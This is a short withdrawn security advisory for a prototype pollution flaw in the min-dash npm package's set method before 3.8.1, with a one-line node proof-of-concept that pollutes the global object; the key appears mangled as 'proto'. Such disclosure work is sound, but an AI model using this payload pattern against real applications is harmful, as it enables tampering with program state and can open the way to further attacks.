The set method is vulnerable to prototype pollution with specially crafted inputs. // insert the following into poc.js and run node poc,js (after installing the package) let parser = require("min-dash"); parser.set({}, [["proto"], "polluted"], "success"); console.log(polluted);
This advisory duplicates another.
Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-2m53-83f3-562j. This link is maintained to preserve external references. Original Description The package min-dash before 3.8.1 are vulnerable to Prototype Pollution via the set method due to missing enforcement of key types.